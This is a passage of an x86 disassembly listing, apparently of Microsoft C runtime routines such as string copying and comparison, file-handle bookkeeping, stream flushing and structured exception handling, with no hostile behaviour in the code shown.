push dword ptr [esi+3Ch]
call sub_412FE4
add esp, 40h
push dword ptr [esi+40h]
call sub_412FE4
push dword ptr [esi+44h]
call sub_412FE4
push dword ptr [esi+48h]
call sub_412FE4
push dword ptr [esi+4Ch]
call sub_412FE4
push dword ptr [esi+50h]
call sub_412FE4
push dword ptr [esi+54h]
call sub_412FE4
push dword ptr [esi+58h]
call sub_412FE4
push dword ptr [esi+5Ch]
call sub_412FE4
push dword ptr [esi+60h]
call sub_412FE4
push dword ptr [esi+64h]
call sub_412FE4
push dword ptr [esi+68h]
call sub_412FE4
push dword ptr [esi+6Ch]
call sub_412FE4
push dword ptr [esi+70h]
call sub_412FE4
push dword ptr [esi+74h]
call sub_412FE4
push dword ptr [esi+78h]
call sub_412FE4
push dword ptr [esi+7Ch]
call sub_412FE4
add esp, 40h
push dword ptr [esi+80h]
call sub_412FE4
push dword ptr [esi+84h]
call sub_412FE4
push dword ptr [esi+88h]
call sub_412FE4
push dword ptr [esi+8Ch]
call sub_412FE4
push dword ptr [esi+90h]
call sub_412FE4
push dword ptr [esi+94h]
call sub_412FE4
push dword ptr [esi+98h]
call sub_412FE4
push dword ptr [esi+9Ch]
call sub_412FE4
push dword ptr [esi+0A0h]
call sub_412FE4
push dword ptr [esi+0A4h]
call sub_412FE4
push dword ptr [esi+0A8h]
call sub_412FE4
add esp, 2Ch
loc_41B249: ; CODE XREF: sub_41B0BB+7�j
pop esi
retn
sub_41B0BB endp
; =============== S U B R O U T I N E =======================================
sub_41B24B proc near ; CODE XREF: sub_416102+5D�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_41B2A8
mov eax, [esi]
mov ecx, off_42D194
cmp eax, [ecx]
jz short loc_41B26F
cmp eax, off_42D164
jz short loc_41B26F
push eax
call sub_412FE4
pop ecx
loc_41B26F: ; CODE XREF: sub_41B24B+13�j
; sub_41B24B+1B�j
mov eax, [esi+4]
mov ecx, off_42D194
cmp eax, [ecx+4]
jz short loc_41B28C
cmp eax, off_42D168
jz short loc_41B28C
push eax
call sub_412FE4
pop ecx
loc_41B28C: ; CODE XREF: sub_41B24B+30�j
; sub_41B24B+38�j
mov esi, [esi+8]
mov eax, off_42D194
cmp esi, [eax+8]
jz short loc_41B2A8
cmp esi, off_42D16C
jz short loc_41B2A8
push esi
call sub_412FE4
pop ecx
loc_41B2A8: ; CODE XREF: sub_41B24B+7�j
; sub_41B24B+4C�j ...
pop esi
retn
sub_41B24B endp
; =============== S U B R O U T I N E =======================================
sub_41B2AA proc near ; CODE XREF: sub_416102+3A�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz loc_41B381
mov eax, [esi+0Ch]
mov ecx, off_42D194
cmp eax, [ecx+0Ch]
jz short loc_41B2D4
cmp eax, off_42D170
jz short loc_41B2D4
push eax
call sub_412FE4
pop ecx
loc_41B2D4: ; CODE XREF: sub_41B2AA+19�j
; sub_41B2AA+21�j
mov eax, [esi+10h]
mov ecx, off_42D194
cmp eax, [ecx+10h]
jz short loc_41B2F1
cmp eax, off_42D174
jz short loc_41B2F1
push eax
call sub_412FE4
pop ecx
loc_41B2F1: ; CODE XREF: sub_41B2AA+36�j
; sub_41B2AA+3E�j
mov eax, [esi+14h]
mov ecx, off_42D194
cmp eax, [ecx+14h]
jz short loc_41B30E
cmp eax, off_42D178
jz short loc_41B30E
push eax
call sub_412FE4
pop ecx
loc_41B30E: ; CODE XREF: sub_41B2AA+53�j
; sub_41B2AA+5B�j
mov eax, [esi+18h]
mov ecx, off_42D194
cmp eax, [ecx+18h]
jz short loc_41B32B
cmp eax, off_42D17C
jz short loc_41B32B
push eax
call sub_412FE4
pop ecx
loc_41B32B: ; CODE XREF: sub_41B2AA+70�j
; sub_41B2AA+78�j
mov eax, [esi+1Ch]
mov ecx, off_42D194
cmp eax, [ecx+1Ch]
jz short loc_41B348
cmp eax, off_42D180
jz short loc_41B348
push eax
call sub_412FE4
pop ecx
loc_41B348: ; CODE XREF: sub_41B2AA+8D�j
; sub_41B2AA+95�j
mov eax, [esi+20h]
mov ecx, off_42D194
cmp eax, [ecx+20h]
jz short loc_41B365
cmp eax, off_42D184
jz short loc_41B365
push eax
call sub_412FE4
pop ecx
loc_41B365: ; CODE XREF: sub_41B2AA+AA�j
; sub_41B2AA+B2�j
mov esi, [esi+24h]
mov eax, off_42D194
cmp esi, [eax+24h]
jz short loc_41B381
cmp esi, off_42D188
jz short loc_41B381
push esi
call sub_412FE4
pop ecx
loc_41B381: ; CODE XREF: sub_41B2AA+7�j
; sub_41B2AA+C6�j ...
pop esi
retn
sub_41B2AA endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41B390 proc near ; CODE XREF: sub_417F13+60�p
; sub_419E4A+8F�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_41B405
sub_41B390 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41B3A0 proc near ; CODE XREF: sub_419E4A+10B�p
; sub_419E4A+116�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_41B3C0
loc_41B3AD: ; CODE XREF: sub_41B3A0+1C�j
mov al, [ecx]
add ecx, 1
test al, al
jz short loc_41B3F3
test ecx, 3
jnz short loc_41B3AD
mov edi, edi
loc_41B3C0: ; CODE XREF: sub_41B3A0+B�j
; sub_41B3A0+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_41B3C0
mov eax, [ecx-4]
test al, al
jz short loc_41B402
test ah, ah
jz short loc_41B3FD
test eax, 0FF0000h
jz short loc_41B3F8
test eax, 0FF000000h
jz short loc_41B3F3
jmp short loc_41B3C0
; ---------------------------------------------------------------------------
loc_41B3F3: ; CODE XREF: sub_41B3A0+14�j
; sub_41B3A0+4F�j
lea edi, [ecx-1]
jmp short loc_41B405
; ---------------------------------------------------------------------------
loc_41B3F8: ; CODE XREF: sub_41B3A0+48�j
lea edi, [ecx-2]
jmp short loc_41B405
; ---------------------------------------------------------------------------
loc_41B3FD: ; CODE XREF: sub_41B3A0+41�j
lea edi, [ecx-3]
jmp short loc_41B405
; ---------------------------------------------------------------------------
loc_41B402: ; CODE XREF: sub_41B3A0+3D�j
lea edi, [ecx-4]
loc_41B405: ; CODE XREF: sub_41B390+5�j
; sub_41B3A0+56�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_41B42E
loc_41B411: ; CODE XREF: sub_41B3A0+85�j
mov dl, [ecx]
add ecx, 1
test dl, dl
jz short loc_41B480
mov [edi], dl
add edi, 1
test ecx, 3
jnz short loc_41B411
jmp short loc_41B42E
; ---------------------------------------------------------------------------
loc_41B429: ; CODE XREF: sub_41B3A0+A6�j
; sub_41B3A0+C0�j
mov [edi], edx
add edi, 4
loc_41B42E: ; CODE XREF: sub_41B3A0+6F�j
; sub_41B3A0+87�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_41B429
test dl, dl
jz short loc_41B480
test dh, dh
jz short loc_41B477
test edx, 0FF0000h
jz short loc_41B46A
test edx, 0FF000000h
jz short loc_41B462
jmp short loc_41B429
; ---------------------------------------------------------------------------
loc_41B462: ; CODE XREF: sub_41B3A0+BE�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41B46A: ; CODE XREF: sub_41B3A0+B6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_41B477: ; CODE XREF: sub_41B3A0+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41B480: ; CODE XREF: sub_41B3A0+78�j
; sub_41B3A0+AA�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_41B3A0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+0Ch]
lea ecx, [ecx+0]
loc_41B4A4: ; CODE XREF: .text:0041B4B1�j
mov al, [edx]
or al, al
jz short loc_41B4B3
add edx, 1
bts [esp], eax
jmp short loc_41B4A4
; ---------------------------------------------------------------------------
loc_41B4B3: ; CODE XREF: .text:0041B4A8�j
mov esi, [ebp+8]
or ecx, 0FFFFFFFFh
lea ecx, [ecx+0]
loc_41B4BC: ; CODE XREF: .text:0041B4CC�j
add ecx, 1
mov al, [esi]
or al, al
jz short loc_41B4CE
add esi, 1
bt [esp], eax
jnb short loc_41B4BC
loc_41B4CE: ; CODE XREF: .text:0041B4C3�j
mov eax, ecx
add esp, 20h
pop esi
leave
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41B4E0 proc near ; CODE XREF: sub_4186A0+1B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
test edx, 3
jnz short loc_41B52C
loc_41B4F0: ; CODE XREF: sub_41B4E0+3C�j
; sub_41B4E0+6A�j ...
mov eax, [edx]
cmp al, [ecx]
jnz short loc_41B524
or al, al
jz short loc_41B520
cmp ah, [ecx+1]
jnz short loc_41B524
or ah, ah
jz short loc_41B520
shr eax, 10h
cmp al, [ecx+2]
jnz short loc_41B524
or al, al
jz short loc_41B520
cmp ah, [ecx+3]
jnz short loc_41B524
add ecx, 4
add edx, 4
or ah, ah
jnz short loc_41B4F0
mov edi, edi
loc_41B520: ; CODE XREF: sub_41B4E0+18�j
; sub_41B4E0+21�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
loc_41B524: ; CODE XREF: sub_41B4E0+14�j
; sub_41B4E0+1D�j ...
sbb eax, eax
shl eax, 1
add eax, 1
retn
; ---------------------------------------------------------------------------
loc_41B52C: ; CODE XREF: sub_41B4E0+E�j
test edx, 1
jz short loc_41B54C
mov al, [edx]
add edx, 1
cmp al, [ecx]
jnz short loc_41B524
add ecx, 1
or al, al
jz short loc_41B520
test edx, 2
jz short loc_41B4F0
loc_41B54C: ; CODE XREF: sub_41B4E0+52�j
mov ax, [edx]
add edx, 2
cmp al, [ecx]
jnz short loc_41B524
or al, al
jz short loc_41B520
cmp ah, [ecx+1]
jnz short loc_41B524
or ah, ah
jz short loc_41B520
add ecx, 2
jmp short loc_41B4F0
sub_41B4E0 endp
; ---------------------------------------------------------------------------
align 10h
mov eax, [esp+0Ch]
test eax, eax
jz short locret_41B5C2
mov edx, [esp+4]
push esi
push edi
mov esi, edx
mov edi, [esp+10h]
or edx, edi
and edx, 3
jz short loc_41B5C3
test eax, 1
jz short loc_41B5A3
mov cl, [esi]
cmp cl, [edi]
jnz short loc_41B5F0
add esi, 1
add edi, 1
sub eax, 1
jz short loc_41B5C0
loc_41B5A3: ; CODE XREF: .text:0041B590�j
; .text:0041B5BE�j
mov cl, [esi]
mov dl, [edi]
cmp cl, dl
jnz short loc_41B5F0
mov cl, [esi+1]
mov dl, [edi+1]
cmp cl, dl
jnz short loc_41B5F0
add edi, 2
add esi, 2
sub eax, 2
jnz short loc_41B5A3
loc_41B5C0: ; CODE XREF: .text:0041B5A1�j
; .text:0041B5FA�j
pop edi
pop esi
locret_41B5C2: ; CODE XREF: .text:0041B576�j
retn
; ---------------------------------------------------------------------------
loc_41B5C3: ; CODE XREF: .text:0041B589�j
mov ecx, eax
and eax, 3
shr ecx, 2
jz short loc_41B5F8
repe cmpsd
jz short loc_41B5F8
mov ecx, [esi-4]
mov edx, [edi-4]
cmp cl, dl
jnz short loc_41B5EB
cmp ch, dh
jnz short loc_41B5EB
shr ecx, 10h
shr edx, 10h
cmp cl, dl
jnz short loc_41B5EB
cmp ch, dh
loc_41B5EB: ; CODE XREF: .text:0041B5D9�j
; .text:0041B5DD�j ...
mov eax, 0
loc_41B5F0: ; CODE XREF: .text:0041B596�j
; .text:0041B5A9�j ...
sbb eax, eax
pop edi
sbb eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_41B5F8: ; CODE XREF: .text:0041B5CB�j
; .text:0041B5CF�j
test eax, eax
jz short loc_41B5C0
mov edx, [esi]
mov ecx, [edi]
cmp dl, cl
jnz short loc_41B5EB
sub eax, 1
jz short loc_41B625
cmp dh, ch
jnz short loc_41B5EB
sub eax, 1
jz short loc_41B625
and ecx, 0FF0000h
and edx, 0FF0000h
cmp edx, ecx
jnz short loc_41B5EB
sub eax, 1
loc_41B625: ; CODE XREF: .text:0041B607�j
; .text:0041B610�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+0Ch]
lea ecx, [ecx+0]
loc_41B644: ; CODE XREF: .text:0041B651�j
mov al, [edx]
or al, al
jz short loc_41B653
add edx, 1
bts [esp], eax
jmp short loc_41B644
; ---------------------------------------------------------------------------
loc_41B653: ; CODE XREF: .text:0041B648�j
mov esi, [ebp+8]
mov edi, edi
loc_41B658: ; CODE XREF: .text:0041B665�j
mov al, [esi]
or al, al
jz short loc_41B66A
add esi, 1
bt [esp], eax
jnb short loc_41B658
lea eax, [esi-1]
loc_41B66A: ; CODE XREF: .text:0041B65C�j
add esp, 20h
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
sub_41B670 proc near ; CODE XREF: sub_41BFAD+220�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
cmp ecx, dword_47A2C8
push esi
push edi
jnb short loc_41B6D3
mov eax, ecx
sar eax, 5
lea edi, ds:47A2E0h[eax*4]
mov eax, ecx
and eax, 1Fh
lea esi, [eax+eax*8]
mov eax, [edi]
shl esi, 2
cmp dword ptr [esi+eax], 0FFFFFFFFh
jnz short loc_41B6D3
cmp dword_42C744, 1
push ebx
mov ebx, [esp+0Ch+arg_4]
jnz short loc_41B6C9
sub ecx, 0
jz short loc_41B6C0
dec ecx
jz short loc_41B6BB
dec ecx
jnz short loc_41B6C9
push ebx
push 0FFFFFFF4h
jmp short loc_41B6C3
; ---------------------------------------------------------------------------
loc_41B6BB: ; CODE XREF: sub_41B670+41�j
push ebx
push 0FFFFFFF5h
jmp short loc_41B6C3
; ---------------------------------------------------------------------------
loc_41B6C0: ; CODE XREF: sub_41B670+3E�j
push ebx
push 0FFFFFFF6h
loc_41B6C3: ; CODE XREF: sub_41B670+49�j
; sub_41B670+4E�j
call ds:dword_41F130 ; SetStdHandle
loc_41B6C9: ; CODE XREF: sub_41B670+39�j
; sub_41B670+44�j
mov eax, [edi]
mov [esi+eax], ebx
xor eax, eax
pop ebx
jmp short loc_41B6E9
; ---------------------------------------------------------------------------
loc_41B6D3: ; CODE XREF: sub_41B670+C�j
; sub_41B670+2B�j
call sub_417C70
mov dword ptr [eax], 9
call sub_417C79
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_41B6E9: ; CODE XREF: sub_41B670+61�j
pop edi
pop esi
retn
sub_41B670 endp
; =============== S U B R O U T I N E =======================================
sub_41B6EC proc near ; CODE XREF: sub_416304+51�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
cmp ecx, dword_47A2C8
push esi
push edi
jnb short loc_41B752
mov eax, ecx
sar eax, 5
lea edi, ds:47A2E0h[eax*4]
mov eax, ecx
and eax, 1Fh
lea esi, [eax+eax*8]
mov eax, [edi]
shl esi, 2
add eax, esi
test byte ptr [eax+4], 1
jz short loc_41B752
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_41B752
cmp dword_42C744, 1
jnz short loc_41B748
xor eax, eax
sub ecx, eax
jz short loc_41B73F
dec ecx
jz short loc_41B73A
dec ecx
jnz short loc_41B748
push eax
push 0FFFFFFF4h
jmp short loc_41B742
; ---------------------------------------------------------------------------
loc_41B73A: ; CODE XREF: sub_41B6EC+44�j
push eax
push 0FFFFFFF5h
jmp short loc_41B742
; ---------------------------------------------------------------------------
loc_41B73F: ; CODE XREF: sub_41B6EC+41�j
push eax
push 0FFFFFFF6h
loc_41B742: ; CODE XREF: sub_41B6EC+4C�j
; sub_41B6EC+51�j
call ds:dword_41F130 ; SetStdHandle
loc_41B748: ; CODE XREF: sub_41B6EC+3B�j
; sub_41B6EC+47�j
mov eax, [edi]
or dword ptr [esi+eax], 0FFFFFFFFh
xor eax, eax
jmp short loc_41B768
; ---------------------------------------------------------------------------
loc_41B752: ; CODE XREF: sub_41B6EC+C�j
; sub_41B6EC+2D�j ...
call sub_417C70
mov dword ptr [eax], 9
call sub_417C79
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_41B768: ; CODE XREF: sub_41B6EC+64�j
pop edi
pop esi
retn
sub_41B6EC endp
; =============== S U B R O U T I N E =======================================
sub_41B76B proc near ; CODE XREF: sub_416304+7�p
; sub_416304+1E�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_47A2C8
jnb short loc_41B795
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_47A2E0[ecx*4]
lea eax, [eax+eax*8]
lea eax, [ecx+eax*4]
test byte ptr [eax+4], 1
jz short loc_41B795
mov eax, [eax]
retn
; ---------------------------------------------------------------------------
loc_41B795: ; CODE XREF: sub_41B76B+A�j
; sub_41B76B+25�j
call sub_417C70
mov dword ptr [eax], 9
call sub_417C79
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
retn
sub_41B76B endp
; =============== S U B R O U T I N E =======================================
sub_41B7AC proc near ; CODE XREF: sub_416387+38�p
; sub_417703+38�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push ebx
push esi
mov ecx, eax
sar ecx, 5
and eax, 1Fh
push edi
lea ebx, ds:47A2E0h[ecx*4]
mov esi, [ebx]
lea edi, [eax+eax*8]
shl edi, 2
add esi, edi
cmp dword ptr [esi+8], 0
jnz short loc_41B80B
push 0Ah
call sub_416901
cmp dword ptr [esi+8], 0
pop ecx
jnz short loc_41B803
lea eax, [esi+0Ch]
push 0FA0h
push eax
call sub_41BBD8
test eax, eax
pop ecx
pop ecx
jnz short loc_41B800
push 0Ah
call sub_41686D
pop ecx
xor eax, eax
jmp short loc_41B81B
; ---------------------------------------------------------------------------
loc_41B800: ; CODE XREF: sub_41B7AC+46�j
inc dword ptr [esi+8]
loc_41B803: ; CODE XREF: sub_41B7AC+32�j
push 0Ah
call sub_41686D
pop ecx
loc_41B80B: ; CODE XREF: sub_41B7AC+24�j
mov eax, [ebx]
lea eax, [eax+edi+0Ch]
push eax
call ds:dword_41F01C ; RtlEnterCriticalSection
xor eax, eax
inc eax
loc_41B81B: ; CODE XREF: sub_41B7AC+52�j
pop edi
pop esi
pop ebx
retn
sub_41B7AC endp
; =============== S U B R O U T I N E =======================================
sub_41B81F proc near ; CODE XREF: sub_4163FE+1�p
; sub_41778A+1�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_47A2E0[ecx*4]
lea eax, [eax+eax*8]
lea eax, [ecx+eax*4+0Ch]
push eax
call ds:dword_41F018 ; RtlLeaveCriticalSection
retn
sub_41B81F endp
; =============== S U B R O U T I N E =======================================
sub_41B841 proc near ; CODE XREF: sub_41BFAD:loc_41C141�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
push ebp
push 0Bh
or ebp, 0FFFFFFFFh
call sub_416882
test eax, eax
pop ecx
jz loc_41B988
push ebx
push esi
push edi
push 0Bh
call sub_416901
xor ebx, ebx
pop ecx
mov [esp+18h+var_8], ebx
mov [esp+18h+var_4], ebx
mov edi, offset dword_47A2E0
loc_41B871: ; CODE XREF: sub_41B841+D5�j
mov esi, [edi]
test esi, esi
jz loc_41B928
lea eax, [esi+480h]
jmp short loc_41B8E1
; ---------------------------------------------------------------------------
loc_41B883: ; CODE XREF: sub_41B841+A2�j
test byte ptr [esi+4], 1
jnz short loc_41B8D7
cmp dword ptr [esi+8], 0
jnz short loc_41B8BC
push 0Ah
call sub_416901
cmp dword ptr [esi+8], 0
pop ecx
jnz short loc_41B8B4
lea eax, [esi+0Ch]
push 0FA0h
push eax
call sub_41BBD8
test eax, eax
pop ecx
pop ecx
jz short loc_41B91E
inc dword ptr [esi+8]
loc_41B8B4: ; CODE XREF: sub_41B841+5A�j
push 0Ah
call sub_41686D
pop ecx
loc_41B8BC: ; CODE XREF: sub_41B841+4C�j
lea ebx, [esi+0Ch]
push ebx
call ds:dword_41F01C ; RtlEnterCriticalSection
test byte ptr [esi+4], 1
jz short loc_41B8E7
push ebx
call ds:dword_41F018 ; RtlLeaveCriticalSection
mov ebx, [esp+18h+var_8]
loc_41B8D7: ; CODE XREF: sub_41B841+46�j
mov eax, [edi]
add esi, 24h
add eax, 480h
loc_41B8E1: ; CODE XREF: sub_41B841+40�j
cmp esi, eax
jb short loc_41B883
jmp short loc_41B903
; ---------------------------------------------------------------------------
loc_41B8E7: ; CODE XREF: sub_41B841+89�j
or dword ptr [esi], 0FFFFFFFFh
mov eax, esi
sub eax, [edi]
push 24h
cdq
pop ecx
idiv ecx
mov ebp, eax
add ebp, [esp+18h+var_4]
cmp ebp, 0FFFFFFFFh
jnz short loc_41B97D
mov ebx, [esp+18h+var_8]
loc_41B903: ; CODE XREF: sub_41B841+A4�j
add [esp+18h+var_4], 20h
inc ebx
add edi, 4
cmp edi, offset dword_47A3E0
mov [esp+18h+var_8], ebx
jl loc_41B871
jmp short loc_41B97D
; ---------------------------------------------------------------------------
loc_41B91E: ; CODE XREF: sub_41B841+6E�j
push 0Ah
call sub_41686D
pop ecx
jmp short loc_41B97A
; ---------------------------------------------------------------------------
loc_41B928: ; CODE XREF: sub_41B841+34�j
mov esi, 480h
push esi
call sub_41344D
test eax, eax
pop ecx
jz short loc_41B97D
add dword_47A2C8, 20h
lea ecx, ds:47A2E0h[ebx*4]
mov [ecx], eax
lea edx, [eax+480h]
jmp short loc_41B966
; ---------------------------------------------------------------------------
loc_41B950: ; CODE XREF: sub_41B841+127�j
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
and dword ptr [eax+8], 0
mov byte ptr [eax+5], 0Ah
mov edx, [ecx]
add eax, 24h
add edx, esi
loc_41B966: ; CODE XREF: sub_41B841+10D�j
cmp eax, edx
jb short loc_41B950
shl ebx, 5
mov ebp, ebx
push ebp
call sub_41B7AC
test eax, eax
pop ecx
jnz short loc_41B97D
loc_41B97A: ; CODE XREF: sub_41B841+E5�j
or ebp, 0FFFFFFFFh
loc_41B97D: ; CODE XREF: sub_41B841+BC�j
; sub_41B841+DB�j ...
push 0Bh
call sub_41686D
pop ecx
pop edi
pop esi
pop ebx
loc_41B988: ; CODE XREF: sub_41B841+10�j
mov eax, ebp
pop ebp
pop ecx
pop ecx
retn
sub_41B841 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B98E proc near ; CODE XREF: sub_4164AA+1E�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0041BA36 SIZE 00000014 BYTES
push 0Ch
push offset stru_428530
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, dword_47A2C8
jnb loc_41BA36
mov eax, ebx
sar eax, 5
lea edi, ds:47A2E0h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41BA36
push ebx
call sub_41B7AC
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41BA0E
push ebx
call sub_41B76B
pop ecx
push eax
call ds:dword_41F12C ; FlushFileBuffers
test eax, eax
jnz short loc_41B9FA
call ds:dword_41F008 ; RtlGetLastWin32Error
mov [ebp+var_1C], eax
jmp short loc_41B9FE
; ---------------------------------------------------------------------------
loc_41B9FA: ; CODE XREF: sub_41B98E+5F�j
and [ebp+var_1C], 0
loc_41B9FE: ; CODE XREF: sub_41B98E+6A�j
cmp [ebp+var_1C], 0
jz short loc_41BA1D
call sub_417C79
mov ecx, [ebp+var_1C]
mov [eax], ecx
loc_41BA0E: ; CODE XREF: sub_41B98E+4D�j
call sub_417C70
mov dword ptr [eax], 9
or [ebp+var_1C], 0FFFFFFFFh
loc_41BA1D: ; CODE XREF: sub_41B98E+74�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41BA2E
mov eax, [ebp+var_1C]
jmp short loc_41BA44
sub_41B98E endp
; =============== S U B R O U T I N E =======================================
sub_41BA2B proc near ; DATA XREF: .rdata:stru_428530�o
mov ebx, [ebp+8]
sub_41BA2B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41BA2E proc near ; CODE XREF: sub_41B98E+93�p
push ebx
call sub_41B81F
pop ecx
retn
sub_41BA2E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41B98E
loc_41BA36: ; CODE XREF: sub_41B98E+15�j
; sub_41B98E+39�j
call sub_417C70
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
loc_41BA44: ; CODE XREF: sub_41B98E+9B�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41B98E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41665F
loc_41BA4A: ; CODE XREF: sub_41665F+E�j
push 10h
push offset stru_428540
call __SEH_prolog
xor ebx, ebx
mov [ebp-1Ch], ebx
push 1
call sub_416901
pop ecx
mov [ebp-4], ebx
push 3
pop edi
loc_41BA69: ; CODE XREF: sub_41665F+5469�j
mov [ebp-20h], edi
cmp edi, dword_47B660
jge short loc_41BACA
mov esi, edi
shl esi, 2
mov eax, dword_47A644
mov eax, [esi+eax]
cmp eax, ebx
jz short loc_41BAC7
test byte ptr [eax+0Ch], 83h
jz short loc_41BA9A
push eax
call sub_412F93
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_41BA9A
inc dword ptr [ebp-1Ch]
loc_41BA9A: ; CODE XREF: sub_41665F+542A�j
; sub_41665F+5436�j
cmp edi, 14h
jl short loc_41BAC7
mov eax, dword_47A644
mov eax, [esi+eax]
add eax, 20h
push eax
call ds:dword_41F024 ; RtlDeleteCriticalSection
mov eax, dword_47A644
push dword ptr [esi+eax]
call sub_412FE4
pop ecx
mov eax, dword_47A644
mov [esi+eax], ebx
loc_41BAC7: ; CODE XREF: sub_41665F+5424�j
; sub_41665F+543E�j
inc edi
jmp short loc_41BA69
; ---------------------------------------------------------------------------
loc_41BACA: ; CODE XREF: sub_41665F+5413�j
or dword ptr [ebp-4], 0FFFFFFFFh
call sub_41BADC
mov eax, [ebp-1Ch]
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41665F
; =============== S U B R O U T I N E =======================================
sub_41BADC proc near ; CODE XREF: sub_41665F+546F�p
; DATA XREF: .rdata:stru_428540�o
push 1
call sub_41686D
pop ecx
retn
sub_41BADC endp
; ---------------------------------------------------------------------------
align 4
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BAF0 proc near ; DATA XREF: __SEH_prolog�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_41BB90
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_41BB23: ; CODE XREF: sub_41BAF0+90�j
cmp esi, 0FFFFFFFFh
jz short loc_41BB89
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_41BB77
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_41BB77
js short loc_41BB82
mov edi, [ebx+8]
push ebx
call sub_413E04
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_413E46
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_413EDA
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_41BB77: ; CODE XREF: sub_41BAF0+40�j
; sub_41BAF0+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_41BB23
; ---------------------------------------------------------------------------
loc_41BB82: ; CODE XREF: sub_41BAF0+54�j
mov eax, 0
jmp short loc_41BBA5
; ---------------------------------------------------------------------------
loc_41BB89: ; CODE XREF: sub_41BAF0+36�j
mov eax, 1
jmp short loc_41BBA5
; ---------------------------------------------------------------------------
loc_41BB90: ; CODE XREF: sub_41BAF0+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_413E46
add esp, 8
pop ebp
mov eax, 1
loc_41BBA5: ; CODE XREF: sub_41BAF0+97�j
